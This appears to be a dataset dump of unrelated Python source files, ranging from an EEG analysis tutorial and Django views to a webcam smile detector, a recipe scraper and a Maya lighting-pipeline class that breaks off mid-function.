text stringlengths 8 6.05M |
|---|
"""
commons.py
Author: Jan Zahalka (jan@zahalka.net)
Common utility functions used by various parts of the system.
"""
import time
def t():
    """
    A timestamp for printouts.
    Returns
    -------
    str
        The current time wrapped in square brackets, e.g. "[01 Jan, 12:00:00]".
    """
    return "[{}]".format(time.strftime("%d %b, %H:%M:%S"))
def tf(seconds):
    """
    Formats time in seconds to days, hours, minutes, and seconds.

    Parameters
    ----------
    seconds : float
        The time in seconds.

    Returns
    -------
    str
        The formatted time; zero-valued leading units are omitted and the
        remaining seconds are rounded to two decimal places.
    """
    days, remainder = divmod(seconds, 60 * 60 * 24)
    hours, remainder = divmod(remainder, 60 * 60)
    minutes, remainder = divmod(remainder, 60)
    parts = []
    if days > 0:
        parts.append("%s days" % int(days))
    if hours > 0:
        parts.append("%s hours" % int(hours))
    if minutes > 0:
        parts.append("%s minutes" % int(minutes))
    parts.append("%s seconds" % round(remainder, 2))
    return ", ".join(parts)
|
"""
This module contains functions that help rank airbnb comment topic vectors by similarity to user input.
That is, when views.py calls `Calculate_similarities`
This function in turn calls helper functions in this module.
The inputs are a string (representing the yourbnb.xyz user's preferences),
a pandas series of the mean topic vectors for each listing,
a dictionary of strings to numbers (that was used to encode the vocabulary in numerical form in the training of the LDA model)
and the LDA model itself.
More details in the functions themselves
"""
import gensim
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from gensim import corpora, models
import nltk
nltk.download('wordnet')  # WordNet corpus is needed by the lemmatizer below
import pickle
import sklearn as sk
import numpy as np
# Path to pickle file for the stemmer and lemmatizer.
# These are used to pre-process the textual input.
# NOTE(review): hard-coded absolute user path — alter the path as needed!
with open('/Users/bennett/Documents/GitHub/airbnb_insight_repo/airbnb_insight/Flask/MVP/nltk_dict.pkl', 'rb') as fp:
    nltk_dict = pickle.load(fp)
# The pickle stores the NLTK *classes*, not instances: the stemmer class is
# instantiated once here, while the lemmatizer class is instantiated at each
# call site.
SnowballStemmer = nltk_dict['stemmer']
stemmer = SnowballStemmer("english")
WordNetLemmatizer = nltk_dict['lemmatizer']
def _Elementwise_cosine_similarity(arr, ctv):
    """
    Cosine similarity of one vector against every row of a matrix.

    ``arr`` has shape (n_comments, n_topics) and ``ctv`` has shape
    (n_topics,); the result is the array of cosine similarities between
    ``ctv`` and each row of ``arr``.
    """
    query = np.array(ctv).reshape(1, -1)
    return sk.metrics.pairwise.cosine_similarity(query, arr)
def Calculate_similarities(fromUser='Default', listings=None, dictionary=None, model=None, langmod=None, elementwise=False):
    """
    Rank listing topic vectors by cosine similarity to the user's input.

    Inputs:
    fromUser: a string (from the input page, representing the yourbnb.xyz
        user's preferences). The sentinel 'Default' means "no input given".
    listings: if elementwise=False, a pandas series (n_listings x n_topics)
        of the average topic vectors for each listing;
        if elementwise=True, a list-of-list-of-list
        (n_listings x comments_per_listing x n_topics)
    dictionary: a gensim dictionary used to convert strings to bag-of-words
    model: a pre-trained gensim LDA model
    langmod: unused; kept for interface compatibility with callers
    elementwise: boolean. If True, apply the cosine similarity row-wise to
        sublists in ``listings``
    Outputs:
    sims: cosine similarities between the user's topic vector and the
        comment vectors in ``listings`` (list-of-float if elementwise=False,
        a list-of-list-of-float otherwise)
    comment_topic_vector: the topic vector encoding the fromUser string.
    When fromUser is 'Default', the string 'check your input' is returned
    instead.
    """
    # BUG FIX: validate the input *before* doing any work. The original
    # computed every similarity first and then threw the result away — and
    # with the default None arguments it crashed on dictionary.doc2bow
    # before ever reaching the guard.
    if fromUser == 'Default':
        return 'check your input'
    # preprocess input text, get the topic vector
    comment_stem_lemma = Preprocess_text(fromUser)
    comment_bow = dictionary.doc2bow(comment_stem_lemma)
    # NOTE(review): model[bow] yields only topics with non-zero weight, so
    # this vector may be shorter than n_topics — confirm against the model.
    comment_topic_vector = [tup[1] for tup in model[comment_bow]]
    # calculate the similarities between user topic vector and listing
    # topic vectors
    if elementwise:
        # for each review
        sims = listings.apply(lambda x: _Elementwise_cosine_similarity(x, comment_topic_vector))
    else:
        # for each topic vector averaged within listings
        sims = sk.metrics.pairwise.cosine_similarity(
            np.array(comment_topic_vector).reshape(1, -1), np.vstack(listings))[0]
    return sims, comment_topic_vector
def Preprocess_text(text):
    """
    Tokenize ``text`` with gensim's simple_preprocess, drop stopwords and
    tokens of length <= 3, then stem-and-lemmatize each surviving token.
    """
    return [
        lemmatize_stemming(token)
        for token in gensim.utils.simple_preprocess(text)
        if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3
    ]
def lemmatize_stemming(text):
    """
    Lemmatize ``text`` as a verb, then stem the result with the
    module-level Snowball stemmer.

    NOTE(review): WordNetLemmatizer here is the class loaded from the
    pickle; it is instantiated anew on every call.
    """
    return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))
def _Model_sentence(sent, langmod):
for c in ['.', ',', '!', '?', ';', '-', '&', '(', ')', '$']:
sent = sent.replace(c, '')
vs = []
for w in sent.split(' '):
try:
vs.append(langmod[x])
except:
continue
return np.mean(vs, axis=0)
|
"""
=======================
Statistical Analysis
=======================
The MOABB codebase comes with convenience plotting utilities and some
statistical testing. This tutorial focuses on what those exactly are and how
they can be used.
"""
# Authors: Vinay Jayaram <vinayjayaram13@gmail.com>
#
# License: BSD (3-clause)
# sphinx_gallery_thumbnail_number = -2
import matplotlib.pyplot as plt
from mne.decoding import CSP
from pyriemann.estimation import Covariances
from pyriemann.tangentspace import TangentSpace
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline
import moabb
import moabb.analysis.plotting as moabb_plt
from moabb.analysis.meta_analysis import ( # noqa: E501
compute_dataset_statistics,
find_significant_differences,
)
from moabb.datasets import BNCI2014_001
from moabb.evaluations import CrossSessionEvaluation
from moabb.paradigms import LeftRightImagery
# Emit informational MOABB log messages and echo the tutorial docstring.
moabb.set_log_level("info")
print(__doc__)
###############################################################################
# Results Generation
# ---------------------
#
# First we need to set up a paradigm, dataset list, and some pipelines to
# test. This is explored more in the examples -- we choose left vs right
# imagery paradigm with a single bandpass. There is only one dataset here but
# any number can be added without changing this workflow.
#
# Create Pipelines
# ----------------
#
# Pipelines must be a dict of sklearn pipeline transformer.
#
# The CSP implementation from MNE is used. We selected 8 CSP components, as
# usually done in the literature.
#
# The Riemannian geometry pipeline consists in covariance estimation, tangent
# space mapping and finally a logistic regression for the classification.
# Four pipelines: CSP and Riemannian (covariance + tangent space) features,
# each paired with both LDA and logistic-regression classifiers.
pipelines = {}
pipelines["CSP+LDA"] = make_pipeline(CSP(n_components=8), LDA())
pipelines["RG+LR"] = make_pipeline(Covariances(), TangentSpace(), LogisticRegression())
pipelines["CSP+LR"] = make_pipeline(CSP(n_components=8), LogisticRegression())
pipelines["RG+LDA"] = make_pipeline(Covariances(), TangentSpace(), LDA())
##############################################################################
# Evaluation
# ----------
#
# We define the paradigm (LeftRightImagery) and the dataset (BNCI2014_001).
# The evaluation will return a DataFrame containing a single AUC score for
# each subject / session of the dataset, and for each pipeline.
#
# Results are saved into the database, so that if you add a new pipeline, it
# will not run again the evaluation unless a parameter has changed. Results can
# be overwritten if necessary.
paradigm = LeftRightImagery()
dataset = BNCI2014_001()
# Keep only the first four subjects so the tutorial runs quickly.
dataset.subject_list = dataset.subject_list[:4]
datasets = [dataset]
overwrite = True  # set to False if we want to use cached results
# One AUC score per subject/session/pipeline, evaluated across sessions.
evaluation = CrossSessionEvaluation(
    paradigm=paradigm, datasets=datasets, suffix="stats", overwrite=overwrite
)
results = evaluation.process(pipelines)
##############################################################################
# MOABB Plotting
# ----------------
#
# Here we plot the results using some of the convenience methods within the
# toolkit. The score_plot visualizes all the data with one score per subject
# for every dataset and pipeline.
# One score per subject, for every dataset and pipeline.
fig = moabb_plt.score_plot(results)
plt.show()
###############################################################################
# For a comparison of two algorithms, there is the paired_plot, which plots
# performance in one versus the performance in the other over all chosen
# datasets. Note that there is only one score per subject, regardless of the
# number of sessions.
fig = moabb_plt.paired_plot(results, "CSP+LDA", "RG+LDA")
plt.show()
###############################################################################
# Statistical Testing and Further Plots
# ----------------------------------------
#
# If the statistical significance of results is of interest, the method
# compute_dataset_statistics allows one to show a meta-analysis style plot as
# well. For an overview of how all algorithms perform in comparison with each
# other, the method find_significant_differences and the summary_plot are
# possible.
stats = compute_dataset_statistics(results)
# P: p-values; T: standardized mean differences between pipelines.
P, T = find_significant_differences(stats)
###############################################################################
# The meta-analysis style plot shows the standardized mean difference within
# each tested dataset for the two algorithms in question, in addition to a
# meta-effect and significance both per-dataset and overall.
fig = moabb_plt.meta_analysis_plot(stats, "CSP+LDA", "RG+LDA")
plt.show()
###############################################################################
# The summary plot shows the effect and significance related to the hypothesis
# that the algorithm on the y-axis significantly outperformed the algorithm on
# the x-axis over all datasets
moabb_plt.summary_plot(P, T)
plt.show()
|
from game.items.item import Hatchet
from game.skills import SkillTypes
class SteelHatchet(Hatchet):
    """Steel-tier hatchet: woodcutting 6 to use, attack 20 to equip."""
    name = 'Steel Hatchet'
    value = 200
    # Skill levels required to gather with / wield this tool.
    skill_requirement = {SkillTypes.woodcutting: 6}
    equip_requirement = {SkillTypes.attack: 20}
    # Combat stats when used as a weapon.
    damage = 122
    accuracy = 316
# -*- coding:utf-8 -*-
class Solution:
    """LeetCode 1300: sum of mutated array closest to target."""

    def findBestValue(self, arr: list, target: int) -> int:
        """
        Return the integer ``value`` such that replacing every element of
        ``arr`` greater than ``value`` with ``value`` brings the array sum
        as close to ``target`` as possible; ties go to the smaller value.

        Improvements over the original: uses a straightforward binary
        search over the candidate cap instead of prefix-sum index juggling
        (which read ``arr[less_idx]`` with ``less_idx == -1``), and no
        longer mutates the caller's list via an in-place sort.
        """
        def capped_sum(value):
            # Array sum with every element clipped to ``value``.
            return sum(min(x, value) for x in arr)

        # Smallest cap whose clipped sum reaches the target, if any.
        lo, hi = 0, max(arr)
        while lo < hi:
            mid = (lo + hi) // 2
            if capped_sum(mid) < target:
                lo = mid + 1
            else:
                hi = mid
        if capped_sum(lo) < target:
            # Even the uncapped sum falls short: capping at the maximum
            # element (i.e. not capping at all) is the best we can do.
            return lo
        # Compare the first cap that reaches target against the one just
        # below it; on a tie the smaller value wins.
        if lo > 0 and target - capped_sum(lo - 1) <= capped_sum(lo) - target:
            return lo - 1
        return lo
print(Solution().findBestValue([1547,83230,57084,93444,70879],71237)) |
import cv2
import imutils
import time
import numpy as np
# Show debug info overlays and detection rectangles
debug = True
# if False, an image of a dog is intended to be shown instead of the video
# (see the commented-out block in the main loop)
showVideo = True
# set frame size
FrameWidth = 1280
FrameHeight = 720
# seconds without a completed smile before the user is reminded to smile
smileReminder = 15
# seconds the user has to smile to reset the reminder
timeToSmile = 10
# Get webcam
cam = cv2.VideoCapture(0)
# # or get Video Stream
# cam = cv2.VideoCapture("http://192.168.178.21:8080/video?type=some.mjpg")
# # load funny image
# dog = cv2.imread('images/image.jpg')
# # or show video
# video1 = cv2.VideoCapture("videos/video.mp4")
# Create the haar cascade for face and smile recognition
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
smile_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_smile.xml')
# function to detect a face and a smile inside
def detectSmile(gray, frame):
    """
    Detect faces in the grayscale image and look for a smile inside each
    face region.

    When the module-level ``debug`` flag is set, bounding rectangles are
    drawn onto ``frame`` (blue for faces, red for smiles).

    Returns the (possibly annotated) frame and a boolean that is True when
    at least one smile was found.
    """
    smileFound = False
    for (x, y, w, h) in face_cascade.detectMultiScale(gray, 1.3, 5):
        if debug:
            cv2.rectangle(frame, (x, y), ((x + w), (y + h)), (255, 0, 0), 2)
        # Restrict the smile search to the face region (views into the
        # originals, so drawing on roi_color marks the frame itself).
        roi_gray = gray[y:y + h, x:x + w]
        roi_color = frame[y:y + h, x:x + w]
        for (sx, sy, sw, sh) in smile_cascade.detectMultiScale(roi_gray, 1.8, 20):
            if debug:
                cv2.rectangle(roi_color, (sx, sy), ((sx + sw), (sy + sh)), (0, 0, 255), 2)
            smileFound = True
    return frame, smileFound
# display debug info if enabled
def debugInfo(frame, smile):
    """
    Overlay debug text (elapsed time, smiled time, smile status) on frame.

    NOTE(review): reads the module-level globals ``elapsedTotal`` and
    ``timeSmiled`` that the main loop assigns each rendered frame — calling
    this before the first rendered frame would raise NameError.
    """
    # display total elapsed time in seconds
    cv2.putText(frame, "Elapsed time: " + str(elapsedTotal), (5, FrameHeight - 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255))
    # display time smiled
    cv2.putText(frame, "Time smiled: " + str(timeSmiled), (5, FrameHeight - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255))
    # display if smile detected or not
    if(smile):
        cv2.putText(frame, "Smile: Yes", (5, FrameHeight - 50), cv2.FONT_HERSHEY_SIMPLEX, 1,(0,0,255),2)
    else:
        cv2.putText(frame, "Smile: No", (5, FrameHeight - 50), cv2.FONT_HERSHEY_SIMPLEX, 1,(0,0,255),2)
# time since last rendered frame and start time
startTime = time.time()
prevTime = startTime
# timestamp of the last completed smile and accumulated smiling time
sinceLastSmile = startTime
timeSmiled = 0
while True:
    # Captures video_capture frame by frame
    _, frame = cam.read()
    # get current time
    curTime = time.time()
    # calculate elapsed time since the previously rendered frame
    elapsed = curTime - prevTime
    # if more than 0.2 seconds elapsed, draw new frame ~ 5 frames per second
    if(elapsed > 0.2):
        # resize image for better performance
        frame = imutils.resize(frame, width=FrameWidth, height=FrameHeight)
        # reset frame timer
        prevTime = curTime
        # total run time in whole seconds (read by debugInfo)
        elapsedTotal = int(curTime - startTime)
        # To capture image in monochrome
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # detect Smiles
        frame, smileFound = detectSmile(gray, frame)
        # if smile detected add smiled time
        if(smileFound):
            timeSmiled += elapsed
            # smiled long enough: reset the reminder timer and the progress
            if(timeSmiled > timeToSmile):
                sinceLastSmile = curTime
                timeSmiled = 0
        # print debug info if enabled
        if debug:
            debugInfo(frame, smileFound)
        # if not smiled for more than "smileReminder" seconds -> smile
        elapsedSinceLastSmile = int(curTime - sinceLastSmile)
        if(elapsedSinceLastSmile >= smileReminder):
            # # offset for dog or video image
            # offsetY = int((FrameWidth/4)*3)
            # if showVideo:
            #     ret, smileVideoFrame = video1.read()
            #     if not (ret):
            #         video1.set(cv2.CAP_PROP_POS_FRAMES, 0)
            #         ret, smileVideoFrame = video1.read()
            #     # resize image for better performance
            #     smileVideoFrame = imutils.resize(smileVideoFrame, width=int(FrameWidth/4), height=int(FrameHeight/4))
            #     frame[0:smileVideoFrame.shape[0], offsetY:offsetY+smileVideoFrame.shape[1]] = smileVideoFrame
            # else:
            #     dog = imutils.resize(dog, width=int(FrameWidth/4), height=int(FrameHeight/4))
            #     frame[0:dog.shape[0], offsetY:offsetY+dog.shape[1]] = dog
            # Display text and current smile progress
            cv2.putText(frame, "Progress: ", (5,60), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0))
            cv2.rectangle(frame, (160, 40), (260, 60), (0, 0, 255), -1)
            # maps smiled seconds onto the 100 px bar; assumes
            # timeToSmile == 10 — TODO confirm / derive from timeToSmile
            progressSmiled = timeSmiled * 10
            cv2.rectangle(frame, (160, 40), (160 + int(progressSmiled), 60), (0, 255, 0), -1)
            cv2.putText(frame, "Please smile :)", (5, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0))
        # Displays the result on camera feed
        cv2.imshow('Video', frame)
    # The control breaks once q key is pressed
    if cv2.waitKey(1) & 0xff == ord('q'):
        break
# Release the capture once all the processing is done.
cam.release()
cv2.destroyAllWindows()
|
# coding=utf-8
from django.db.models.query import QuerySet
from django.db.models.sql.query import Query
from django.http import HttpResponseRedirect, HttpResponse
from django.views.generic.edit import CreateView, UpdateView
from django.shortcuts import render_to_response, redirect
from django.views.generic.list import ListView
from abit.forms import AbitRequestForm
from abit.models import AbitRequest, EducationalForm, Speciality
from abit.dummy import Generator
class AddAbitRequestView(CreateView):
    """Creation form for an AbitRequest; stamps the current user as creator."""
    model = AbitRequest
    template_name = 'abitrequest_form.html'
    context_object_name = 'abit_form'
    form_class = AbitRequestForm
    success_url = '/abit/list/'

    def form_valid(self, form):
        """Attach the requesting user before saving, then redirect."""
        abit_request = form.save(commit=False)
        abit_request.creator = self.request.user
        abit_request.save()
        return redirect(self.success_url)
class AbitRequestListView(ListView):
    """Paginated list of all AbitRequest records, newest first."""
    template_name = 'reqslist.html'
    context_object_name = 'abitrequest_list'
    paginate_by = 50

    def get_queryset(self):
        """Every AbitRequest, ordered by date descending."""
        return AbitRequest.objects.all().order_by('-date')
class EditAbitRequestView(UpdateView):
    """Edit form for an existing AbitRequest (same template as creation)."""
    model = AbitRequest
    template_name = 'abitrequest_form.html'
    context_object_name = 'abit_form'
    form_class = AbitRequestForm
    success_url = '/abit/list/'
def reqcmp(x,y):
    """Python 2 cmp-style comparator: orders by ``sum_bal`` descending."""
    return -cmp(x.sum_bal,y.sum_bal)
class RatingListView(ListView):
    """
    Rating table for one speciality: requests sorted by total score, with a
    quota of privileged applicants promoted to the top of the list.
    """
    template_name = 'rating.html'
    context_object_name = 'abitrequest_list'

    def getSpec(self):
        """Speciality name from the ?q= query parameter (with a default)."""
        if 'q' in self.request.GET:
            return self.request.GET['q']
        else:
            return u'Економіка підприємства'

    def get_queryset(self):
        # self.args[0]
        spec = self.getSpec()
        spec = Speciality.objects.filter(name=spec).get()
        # return HttpResponse(spec)
        # All requests for the speciality, best score first (Python 2
        # cmp-style in-place sort).
        reqs = list(AbitRequest.objects.all().filter(speciality=spec))
        reqs.sort(cmp=reqcmp)
        reqs_priv = [ab for ab in reqs if ab.privilege]
        reqs_priv.sort(cmp=reqcmp)
        # Up to a quarter of the budget places go to privileged applicants;
        # at least one place when there is any budget at all.
        bugdet_priv_count = spec.budget / 4
        if bugdet_priv_count == 0 and spec.budget != 0:
            bugdet_priv_count = 1
        i=0
        # Move the top privileged requests to the head of the rating.
        if reqs_priv:
            for r in reqs_priv:
                if i < bugdet_priv_count:
                    reqs.remove(r)
                    reqs.insert(i,r)
                i+=1
        return reqs

    def get_context_data(self, **kwargs):
        """Add the speciality list and the current selection for the template."""
        context = super(RatingListView,self).get_context_data(**kwargs)
        context['specs'] = Speciality.objects.all()
        context['selected'] = self.getSpec()
        return context
def Init(request):
    """Populate the database with generated dummy data, then redirect to
    the request list."""
    g = Generator()
    g.generateBase()
    g.generateAbitRequests(request)
    return HttpResponseRedirect('/abit/list/')
|
import sys, getopt, re
from subprocess import Popen, PIPE, STDOUT

# Probe a media file with ffmpeg and print its stream information.
#
# BUG FIX: the original option strings ('f', ['file']) declared -f/--file
# as value-less flags and then read the path from the first *positional*
# argument, contradicting the error message below. 'f:' / 'file=' make the
# options actually take the file path as a value.
opts, args = getopt.getopt(sys.argv[1:], 'f:', ['file='])
file = None
for opt, val in opts:
    if opt in ('-f', '--file'):
        file = val
if file is None:
    print('-f (--file) must be specified with a valid file path')
    sys.exit(2)
# Argument list instead of a shell-interpolated string: the path can no
# longer break the command or inject shell syntax. ffmpeg writes the
# stream info to stderr, so it is merged into stdout.
proc = Popen(['/usr/local/bin/ffmpeg', '-i', file], stdout=PIPE, stderr=STDOUT)
result = proc.communicate()
print(result[0])
|
import requests
from bs4 import BeautifulSoup
import re
import csv
from janome.tokenizer import Tokenizer
information=[]
html=requests.get('http://recipe.hacarus.com/')
soup=BeautifulSoup(html.text,'html.parser')
for news in soup.findAll('li'):
    # Fetch each menu item's page via the link in the list entry
    html2=requests.get('http://recipe.hacarus.com'+news.a.get("href"))
    soup2=BeautifulSoup(html2.content,'html.parser')
    header=soup2.header.p.string
    # Extract the cooking time from the page header
    cooktime=header.replace(" ","").replace("(","").replace(")","").strip()
    recipe=re.split('[\n分]', cooktime)
    del recipe[0::2]
    # If the time is written in hours, convert it to minutes
    m=re.search('時間',recipe[0])
    if m:
        b=recipe[0].strip("時間以上")
        recipe[0]=int(b)*60
    # Convert the cooking time to an integer
    recipe[0]=int(recipe[0])
    # Count the ingredients (rows of the first table)
    ingredient=len(soup2.tbody.findAll('tr'))
    # Rename the first tbody so the next .tbody lookup finds the second table
    soup2.tbody.name="tbody1"
    recipe.append(ingredient)
    # Count the preparation steps (rows of the second table)
    cookway=len(soup2.tbody.findAll('tr'))
    recipe.append(cookway)
    # Collect the recipe description text
    sentence1= soup2.figcaption.p.string.replace(" ","").strip()
    sentence2=soup2.find_all("div",class_="content")[2].text.replace(" ","").replace("\n","").replace("ポイント","").strip()
    sentence=sentence1+sentence2
    # Morphological analysis: collect the nouns used, ranked by frequency
    t=Tokenizer()
    word_dic={}
    tokens=t.tokenize(sentence)
    for w in tokens :
        word=w.surface
        ps=w.part_of_speech
        if (re.match('名詞,(一般|固有名詞|サ変接続|形容動詞語幹)',ps)):
            if not word in word_dic:
                word_dic[word]=0
            word_dic[word]+=1
    # Keep the three most frequent nouns as keywords
    keys=sorted(word_dic.items(),key=lambda x:x[1],reverse=True)
    for word1,cnt in keys[:3]:
        recipe.append(word1)
    # Store the collected information for this recipe
    information.append(recipe)
# NOTE(review): the header names 4 columns but each row holds up to 6 values
# (cooktime, ingredients, cookway, then up to three keywords) — confirm the
# intended CSV layout.
with open('recipe.csv','w') as f:
    writer=csv.writer(f)
    writer.writerow(['cooktime','ingredients','cookway','keyword'])
    writer.writerows(information)
|
# !/usr/bin/python
"""
-----------------------------------------------
Bardel Shot Light Core
Written By: Colton Fetters
Version: 1.2
First release:
-----------------------------------------------
"""
# Import module
import os.path
import maya.OpenMaya as om
import maya.cmds as cmds
import maya.mel as mel
import pymel.core as pm
import slt
import imp
# DW module
import light.menu.lightingDock
from light.v2.HUB.xgen import xgenReference
from light.tools.shotLightProps import ui
# Studio module
import farm.bd_deadline_submitter
import bd_lib.bd_main_lib as main_lib
from bd_lib.bd_config_lib import config
from bd_lib.bd_save_controller import SaveController
from bd_lay.bd_scene_info import SceneInfo
from validate import lrc
from bd_light import bd_prop_lightingUI
from sec_viewer import camera_sec_viewer as camera_sec_viewer
from bd_propagator import shot_prop as shot_prop
from gi_bake import gi_bake_tool_002 as gi_bake
from prop_set_tool import prop_set_tool_002 as prop_set
from prop_set_tool import prop_tool_box as tool_box_m
from auto_layer import layers_clean_002 as auto_layer_m
from auto_layer import auto_layer_core as auto_layer_core_m
from dock_control_tool import dockAnyWindow as dock_m
from set_checker import universal_set_fixer
# Show module
import bd_light_tool.utils.date_time as datetime_m
import bd_light_tool.utils.character_rims as rims_m
import bd_light_tool.utils.shot_light_creator as creator_m
import bd_light_tool.utils.shader_adjustments as shader_m
import bd_light_tool.utils.file_browser_tools as file_m
import bd_light_tool.utils.light_tweaker as tweak_m
# TODO
import dtx_lrc_tools.key_light_fix as light_fix
import dtx_lrc_tools.world_pref_creator as world_pref
import dtx_asset_tools.texture_swap as tx_fix
import pib_tools.lighting_tools.shot_loader_tool.shot_loader as shot_load_m
import wds_tools.lrc.MazeCavesFxSetup as MazeCavesFxSetup
import mj_tools.WDS_eyeSpec as spec
# Reload the studio/show modules so code edits are picked up without
# restarting Maya (Python 2 builtin ``reload``).
reload(lrc)
reload(camera_sec_viewer)
reload(shot_prop)
reload(gi_bake)
reload(prop_set)
reload(tool_box_m)
reload(auto_layer_m)
reload(auto_layer_core_m)
reload(dock_m)
reload(rims_m)
reload(creator_m)
reload(shader_m)
reload(file_m)
reload(light_fix)
reload(world_pref)
reload(tx_fix)
class Core(object):
def __init__(self, ui=None):
    """
    Shot-light core controller.

    :param ui: optional UI object; when present, methods report status to
        its ``printedInfo`` scroll field.
    """
    self._WORK_SPACE = cmds.workspace(fullName=True)  # current Maya workspace
    self._SHOW = os.getenv('BD_PROD')  # active show code (e.g. contains 'DTX'/'WDS')
    self.ui = ui
    # Allowed sec/anim save gap — presumably hours; compared against the
    # hours field in sec_anim_checker. TODO confirm units.
    self._TIME_DIFFERENCE = 1
    self._FAR_CLIP = 100000  # camera far clip plane
    self._NEAR_CLIP = 1      # camera near clip plane
    self._EP_TOOLS = 'B:\\artists\\current\\src\\{}_tools\\lrc\\episodic_tools\\Episode_'.format(self._SHOW)
    self._RESET_CONFIG = (os.path.join(config.get('project_path'), 'sys/validate/config.json'))

def directory_buttons_click(self, choose):
    """Delegate a directory-button click to the file-browser tool."""
    file_m.Core().directory_buttons_click(choose)
# UI FUNCTIONALITY
def window_refresher(self, state):
    """
    Suspend or resume Maya interface refreshes for faster batch operations.

    :param state: True disables the interface refresh, False re-enables it
    :return: the state that was applied
    """
    cmds.refresh(su=state)
    message = 'Window Refresh Deactivated' if state else 'Window Refresh Activated'
    om.MGlobal.displayInfo(message)
    return state
# Shot Setup -PRE PROCESS SHOT-
def launch_scene_picker(self, *args):
    """
    Loads Legacy BD Shot Loader Tool (only when a UI is attached).
    :param args: Button
    :return: None
    """
    if self.ui is not None:
        shot_load_m.shot_loaderUI().main()
        result = 'Success - Finding Shot'
        pm.scrollField(self.ui.printedInfo, text=result, e=True)

def dw_prop_light_tool(self, *args):
    """Launch the DW shot-light-props window."""
    ui.Window().run()

def dw_light_tool(self, *args):
    """
    Loads DW Shot Light Tool
    :param args: Button
    :return: None
    """
    # Each show has its own entry point in slt.
    if "DTX" in self._SHOW:
        slt.run_dtx()
    elif "WDS" in self._SHOW:
        slt.run_wds()
def increment_save(self, *args):
    """
    Increment Save without the save UI (only when a UI is attached).
    :param args: Button
    :return: None
    """
    if self.ui is not None:
        # Drop the main viewport to a cheap display mode so the save
        # opens/closes quickly
        cmds.modelEditor('modelPanel4', e=True, displayAppearance='boundingBox')
        cmds.modelEditor('modelPanel4', e=True, allObjects=0)
        cmds.modelEditor('modelPanel4', e=True, polymeshes=True)
        cmds.modelEditor('modelPanel4', e=True, lights=True)
        # Gather info to save properly on the BD pipeline
        save_info = SaveController(main_lib.file_manager,
                                   main_lib.scene_manager,
                                   main_lib.notes_manager,
                                   main_lib.animation_manager,
                                   main_lib.ui_manager)
        # Save command: bump the version without prompting for a note
        save_info.increment_version(save_type="save", require_note=False,)
        pm.scrollField(self.ui.printedInfo, text="Success - Increment Save", e=True)
def load_all_references(self, *args):
    """
    Loads all the unloaded .ma references in the scene.

    Texture-file references (.tx/.exr/.tif/.jpg) are skipped; any other
    extension triggers a warning.

    :param args: Button
    :return: list of status strings, one per reference
    """
    references = cmds.file(q=True, r=True, list=True)
    referencesLoaded = list()
    for reference in references:
        # Parse through the file list
        if '.ma' in reference:
            if cmds.file(reference, deferReference=True, q=True):
                # queries the status of the shot
                print("{} is currently unloaded!".format(reference))
                # references the .ma files that are not loaded
                cmds.file(reference, loadReference='%s' % reference)
        elif any(ext in reference for ext in ('.tx', '.exr', '.tif', '.jpg')):
            # BUG FIX: the original condition `'.tx' or '.exr' or '.tif' or
            # '.jpg' in reference` was always truthy (non-empty string), so
            # every non-.ma reference matched here and the warning below
            # was unreachable.
            pass
        else:
            cmds.warning('Reference has improper extension type\n{}'.format(reference))
        referencesLoaded.append(reference + ' Loaded Reference')
    return referencesLoaded
def set_render_globals(self, *args):
    """
    Sets BD Render Globals
    :param args: Button
    :return: status string on success, None after a warning on failure
    """
    # Colour management must be enabled before applying the show globals
    cmds.colorManagementPrefs(cmEnabled=True, edit=True)
    try:
        cmds.setAttr('vraySettings.cam_environmentVolumeOn', 0)
        setup = main_lib.render_manager.render_globals_setup
        setup.set_render_globals()
        return "Render Globals success"
    except RuntimeError:
        cmds.warning("Render Globals failed")
def sec_anim_checker(self, *args):
    """
    Checks the Anim file against the newest Sec file for the open shot.
    :return: 'Success' or a 'FAILED - ...' status string
    """
    # Derive show/season/episode/seq/shot from the open scene path
    mayaPath = cmds.file(q=True, sceneName=True)
    sceneInfo = SceneInfo(mayaPath)
    season = sceneInfo.season
    episode = sceneInfo.episode
    seq = sceneInfo.seq
    shot = sceneInfo.shot
    animFile = '{}_{}{}_{}_{}_Anim_BD.ma'.format(self._SHOW, season, episode, seq, shot)
    wipPath = sceneInfo.get_root_dir()
    animPath = (sceneInfo.get_dir()).split('WIP')[0]
    secPath = '{}/Sec'.format(wipPath)
    mayaSecFiles = os.listdir(secPath)
    if mayaSecFiles == []:
        result = 'FAILED - No Sec Files Yet'
        return result
    else:
        # Drop filesystem noise before picking the newest Sec file.
        # NOTE(review): the bare except hides more than the expected
        # ValueError when an entry is absent.
        try:
            mayaSecFiles.remove('Thumbs.db')
            mayaSecFiles.remove('.mayaSwatches')
        except:
            pass
        # Lexicographic sort: the last entry is assumed to be the newest
        mayaSecFiles.sort()
        latestSecShot = mayaSecFiles[-1:][0]
        self._SEC_FILE = os.path.normpath('{}/{}'.format(secPath, latestSecShot))
        self._ANIM_FILE = os.path.normpath('{}{}'.format(animPath, animFile))
        # If you have a scene open the above code will execute, otherwise nothing will happen
        if os.path.exists(self._SEC_FILE):
            secTime = datetime_m.get_file_modified_time(self._SEC_FILE)
            secDay = datetime_m.get_file_modified_day(self._SEC_FILE)
            secMonth = datetime_m.get_file_modified_month(self._SEC_FILE)
            secYear = datetime_m.get_file_modified_year(self._SEC_FILE)
            animTime = datetime_m.get_file_modified_time(self._ANIM_FILE)
            animDay = datetime_m.get_file_modified_day(self._ANIM_FILE)
            animMonth = datetime_m.get_file_modified_month(self._ANIM_FILE)
            animYear = datetime_m.get_file_modified_year(self._ANIM_FILE)
            # run all checks on file date and time creation - year, month, day
            if secYear == animYear and secMonth == animMonth and secDay == animDay:
                timeDiff = datetime_m.get_time_difference(secTime, animTime)
                splitDiff = str(timeDiff).split(':')
                s = 'Sec/Anim save time difference is {2} Hours, {1} Mins, {0} Secs'
